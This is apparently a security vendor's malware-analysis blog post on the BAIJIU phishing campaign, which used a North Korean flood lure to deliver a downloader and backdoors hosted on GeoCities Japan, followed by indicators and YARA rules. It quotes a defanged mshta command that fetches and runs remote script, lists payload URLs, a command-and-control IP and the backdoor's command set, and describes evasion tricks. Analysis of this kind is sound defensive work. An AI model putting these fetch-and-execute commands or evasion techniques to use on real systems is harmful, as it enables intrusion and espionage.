Attack Analysis - Background and Lure
With international attention focused on the tinderbox of the Korean peninsula, Cylance is shedding new light on a threat we call BAIJIU, one that preys upon heightened interest into what’s going on inside the borders of the hermit kingdom of North Korea.
BAIJIU, which evades widespread detection, abuses global concern about the dire humanitarian situation in North Korea. It enters the target environment through an LNK file on the end of a phishing hook with the following bait:
“2016 North Korea Hamgyung [sic] province flood insight.”
The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that wiped out much of North Korea’s province of North Hamgyong, impacting more than half a million people, drawing world-wide notice, and commanding international news coverage for several months.
Despite the media attention, details were sparse regarding the extent and aftermath of the crisis. Reports surfaced of attempts at escape and defection to neighboring China, after border forces and fencing were washed away.
Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945. The dictatorship appealed to the UN and aid groups for help with relief efforts, and asked the international community for monetary support.
How the crisis was resolved, and what its lasting impact was on North Korea is anyone’s guess. Exactly how many people died or were displaced? Were North Korea’s official pronouncements to be believed? BAIJIU’s attackers bet that many of their phishing targets would click on their attachment to find out just that – in other words, they would take the bait.
Attack Analysis – Provenance and C2
BAIJIU’s goal in this attack was to deploy a set of espionage tools through a downloader we call TYPHOON and a set of backdoors we call LIONROCK.
Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities (of 1990s fame); and the use of multiple methods of obfuscation. These features have, as far as we can see, helped BAIJIU evade nearly every antivirus (AV) solution.
Cylance believes TYPHOON/LIONROCK’s provenance is likely Chinese, and that it probably evolved from the Egobot codebase first described by Symantec here and is subsequently connected to the larger Dark Hotel Operation written up by Kaspersky here.
The tip of the spear – the LNK file itself – was a shortcut to execute the following command:
C:\Windows\System32\cmd.exe /C start "" mshta "about:<script>map1='hxxps://support.google(dot)com/maps/answer/3093609?co=GENIE.Platform_Desktop';map2='hxxps://support.google(dot)com/maps/answer/437584?co=GENIE.Platform_Desktop';map3='hxxps://support.google(dot)com/maps/answer/125748?co=GENIE.Platform_Desktop';</script><script>window.moveTo(99999,99999)</script><script language='javascript' src='hxxp://www.geocities(dot)jp/zboard01/001/1.tmp'></script><script>window.close()</script>""
Ultimately, the JavaScript of interest would be downloaded and executed from:
“hxxp://www.geocities(dot)jp/zboard01/001/1.tmp”.
GeoCities, now owned by Yahoo, is a web hosting service in Japan which anyone with a Yahoo email address can use. The service is free and does not require users to identify themselves beyond providing a Yahoo email address. These features make it attractive to ordinary users, but seem to have also drawn those who see value in appropriating the service for illicit ends.
We realize GeoCities may seem like a total blast from the past, but Cylance is not alone in noticing its second act revival and its apparent popularity as a launching pad for malware.
A security researcher known as “unixfreaxjp" who founded non-profit security research group “malwaremustdie.org,” found that GeoCities has recently been leveraged in separate targeted attacks to deliver Poison Ivy payloads in March 2017. “Poison Ivy” has long been associated with Chinese APT groups. You can read more about this researcher’s findings on the use of GeoCities here.
Over the course of our investigation, Cylance saw that GeoCities was being heavily leveraged across multiple campaigns. We identified ten active sites hosted on the service that were used to deliver similar malicious payloads (see the end of this blog for full details).
Attack Analysis - Malware
Our analysis of “hxxp://www.geocities(dot)jp/zboard01/001/1.tmp” shows that the first six lines of “1.tmp” set up encoded variables:
These lines were immediately of interest, and tracing their use in the code led to a function called “EXR,” which was used to decode the variables.
We coded EXR in python below for easy reuse:
def EXR(p):
s = ''
for x in p:
c = 0
if ord(x)&64 != 0:
c = c | 0x20
else:
c = c & 0xDF
if ord(x)&32 != 0:
c = c | 0x40
else:
c = c & 0xBF
if ord(x)&16 != 0:
c = c | 0x02
else:
c = c & 0xFD
if ord(x)&8 != 0:
c = c | 0x08
else:
c = c & 0xF7
if ord(x)&4 != 0:
c = c | 0x04
else:
c = c & 0xFB
if ord(x)&2 != 0:
c = c | 0x10
else:
c = c & 0xEF
if ord(x)&1 != 0:
c = c | 0x01
else:
c = c & 0xFE
s += chr(c)
return s
Figure 2: Python Snippet to Decode Variables
“pa0” was never referenced anywhere else in the code. But the rest of the variables from Figure 1 decoded to the following:
The two files, “nomz32.tmp” and “nomz64.tmp”, hosted on GeoCities Japan, were a 32bit and 64bit DLL, respectively, with the “MZ” header removed. Removing the “MZ” header appears to have significantly aided in decreasing detection rates, as neither file was flagged by traditional or NextGen AV.
In fact, this was almost surely a deliberate attempt by the attackers to evade common network intrusion signatures. But it also may have been necessary to upload the files to GeoCities in the first place.
Either way, the 1.tmp JavaScript code block contained a function, which would write back the header after the respective file was already downloaded to the hard drive:
nomz32.tmp – 8b1688d3779f408262d0eca9f486f9039e3607a07e20df52181b4ba585c1939a
regsv32.dll – 30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207
nomz64.tmp – d352cdf812645e6f2d890da871ee3ae95c0be7a2520af49132f2b50080fbd67a
regsv64.dll – 9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a
The files both conveniently utilized the same string-encoding algorithm as the JavaScript, which sped up analysis quite a bit. Both DLLs functioned as elaborate launchers for a PowerShell script encoded within their resource sections.
Instead of utilizing the FindResource or FindResourceEx functions, the backdoors mapped the entire file using CreateFileMappingW and MapViewOfFile, then proceeded to search for the string “<<<:resource”.
Once the string was identified the PowerShell script was decoded by XOR’ng every byte against the byte 0x1F. This was likely done in an attempt to evade established detection methods for this type of obfuscation.
The script was then invoked using the following command: “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -noprofile Invoke-Command -scriptblock {%s}” where %s was the contents of the decoded script. The backdoors both employed a number of tricks to avoid automated emulation and analysis as well as simple tricks to hinder debugging.
Both files were also signed using an expired digital certificate belonging to “www.mywellnessmatters.com”.
Certificate Details:
Name: www.mywellnessmatters.com
Valid: Feb 19, 2007 to Feb 22, 2010
Serial Number: 20 18 98 C3 00 00 00 00 74 E0
The PowerShell script encoded within the resource section used some rudimentary methods to obfuscate variable and function names by rendering them to arbitrary combinations of the characters “\/_=”.
However, it conveniently employed the same string-encoding algorithm as the JavaScript:
Further analysis of the script showed it was a rather elegant launcher that would routinely query the sites listed above and sleep if nothing was available.
Cylance succeeded in downloading “hxxp://www.geocities(dot)jp/toedu01/informa(dot)txt”, a secondary PowerShell script. This PowerShell script was responsible for delivering and executing the final payloads. Fortunately for us, it also utilized the same method of string encoding:
The script would download the respective 32-bit (scnpst32.tmp and contab32.tmp) or 64-bit payloads (scnpst64.tmp and contab64.tmp). And once downloaded to disk, it would write back the “MZ” header to each file.
The scnpstXX.tmp DLLs functioned as loaders for their respective 32-bit or 64-bit contabXX.tmp files. Both scnpstXX.tmp files were additionally signed with an unusual expired certificate with an Icelandic flavor:
Certificate Details:
Name: secure.hotelcentrum.is
Valid: Feb 27, 2005 to March 30, 2007
Serial Number: 03 36
Although the name aligns with a popular Icelandic hotel, Hotel Reykjavík Centrum, the certificate does not seem to belong to the hotel itself.
The files also employed a slightly different encoding mechanism involving several byte shifts and a single-byte XOR for several strings, which would have likely triggered AV heuristics.
The contabXX.tmp DLLs were full-featured backdoors that provided the attacker the ability to enumerate and manipulate files, enumerate drive and volume information, manipulate processes, enumerate and manipulate registry information, upload/download files, capture screenshots, and securely remove traces of the backdoor.
The DLLs would accept the following commands.
• activeport
• ddel
• ddir
• diskinfo
• exit
• find
• httpget
• packetsize
• prockill
• proclist
• procspawn
• recent
• regkeydel
• reglist
• reglistall
• regvaldel
• rereg
• screenauto
• screenupload
• sdir
• strings
• system
• timeout
• upload
• wipe
Both samples communicated back to the IP address “103.8.27.135.” Additional analysis is ongoing into the network protocol itself.
Cylance was unable to find additional lures. However, as mentioned above, numerous similar payloads and scripts were identified across GeoCities Japan websites.
TYPHOON Payloads:
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz32.tmp
hxxp://www.geocities[dot]jp/akikoakagi1013/nomz64.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz32.tmp
hxxp://www.geocities[dot]jp/lboard_01/nomz64.tmp
LIONROCK Payloads
hxxp://www.geocities[dot]jp/coloseaer_0812/contab32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/contab64.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst32.tmp
hxxp://www.geocities[dot]jp/coloseaer_0812/scnpst64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/contab64.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst32.tmp
hxxp://www.geocities[dot]jp/jjboard_01/scnpst64.tmp
PowerShell Scripts:
hxxp://www.geocities[dot]jp/hanakofukumoto/colinsta.txt
hxxp://www.geocities[dot]jp/junkohagiwara3/readmesub.txt
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_m.tmp
hxxp://www.geocities[dot]jp/murimakiyami/ps001/update_s.tmp
hxxp://www.geocities[dot]jp/pboard01/informab.txt
hxxp://www.geocities[dot]jp/toedu01/informa.txt
Conclusions:
BAIJIU’s circuitous route from LNK file to LIONROCK backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out.
BAIJIU attackers likely employed this strategy to throw researchers and investigators off their track, and ensure only the targeted victims received the payloads. Automated sandbox systems would also presumably fail to reach the final payloads, as numerous sleep loops were present in the PowerShell scripts, in addition to anti-emulation tricks in the DLL downloader.
Appropriating the GeoCities’ free, high-bandwidth, civilian infrastructure also helps BAIJIU hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo’s GeoCities.
While Cylance maintains that an explication of new attack methods is more valuable to end-users than speculative attempts at attribution, the skill level employed by BAIJIU suggests a worthy adversarial threat.
Whoever BAIJIU’s authors are or what their intent may be, one thing is clear: the TYPHOON/LIONROCK attack chain has evaded nearly every legacy AV and NextGen AV solution on the market today. Cylance is the exception.
TYPHOON Samples:
16486b17c635038d0ff0a035d5c0c89bbd62ca6d85b4161060c5bd05de69924e |
2cc0dbe268f4184b167aff4089feaa8a3ee91eac6a25112c9498558e8bab193c |
30a3503394d5de2912eb27fcf0ae24fcbfa7d27a4a49a1e6ce7271db211ab207 |
3d7fce51cbab9847bd4ab95ccd9db7cc6c096add99b6285639be5231ff6013c6 |
422addad546c4418173751567d18a05b080285910c9199b544d6f08f15838a22 |
4a3dba1be5634477b99b9940a7adebdf81c2746172aad5fd08e2366e19bb7a7f |
6b0042fa0a599f0e4530806474f765f2896eeca69d9489eabb4ff9aac284acd8 |
9ad91bd5860bd87e9823ee19c52515327c9230b4444fb91ad38821394b1b055a |
LIONROCK Samples:
22092aefddda66776c344ee5a239ea988ed70a20176ce7977aff7debde61253b |
26108999e34af20b4f730e0a937435e2da108b6014a8f6c3b5d2c213499b0476 |
4fa44236abd43d0da4a46765eb1da5d070a06d0b2fc16e728dda729f31d9e55d |
62f4c97791109991904173c6d8ef6ffcd834a6944dff2395421fd504ebb6a631 |
6b0c3e4980355687fc39e86e18dff9ddb323d2048a20eb2f253d884881b41f6c |
8608081e5d76b0eacfefa2c57de683655cb70fcfe22b222dbc6afeb7b8102226 |
bdd24214a52f995a51e41f5061d2dfb02159abfd157de205c9359d5a9cab06a2 |
c561fd9cc5e6eb10f17935eee88b841e125b1a08a6d500243ea5084629904183 |
c72121a61ca608e57ccb8a17e6d2c8e621f5c51e9b701bdf38a4a673dcf3b077 |
def1c8c557b33294e1334479a6a1840be21b1fcfe82ecd120e4a296fba78107b |
Javascript Payload:
63499f7445158553c7b15484ccd18e4147dc7dc8205e6b62abc5f52071b1df9f
YARA Rules:
rule Lionrock_Powershell
{
strings:
$http = "hffbZ]]"
$geo = "www\\ue}qifies\\xb]"
condition:
$http or $geo
}
rule Typhoon_Downloader
{
strings:
$ps = "<<<:resource"
$exp = "start_adobeup"
$e = "W78D432S34A9"
$f = "!SJ1B0RSWRKK"
$b = "wyy}EBB"
$geo = "hhhCjzbnvyvzlCg}B"
condition:
$ps or $exp or ($e and $f) or $b or $geo
}
rule Lionrock_Loader
{
strings:
$a = "sfarfdk|amiqd|s"
$b = "s1-s{wlsz,s"
$c = "q}llyer|eldll"
condition:
($a and $b) or $c
}
rule Lionrock_Backdoor
{
strings:
$a = "windows\\currentversion\\run;reglist"
$power = "b}wershell\\eje@M|}br}tile@)|v}yeM1}mma|d@Msqribfpl}qy{DbafhOUEsU[DdafaO5efM1}|fe|f@Dbafh[t}reaqhHDqmd@i|@DdafaI{iej@Dqmd[oo" $b = "agf}ejeqdir"
$c = "sfarfdk|amiqd|s"
condition:
$power or $b or ($a and $c)
}
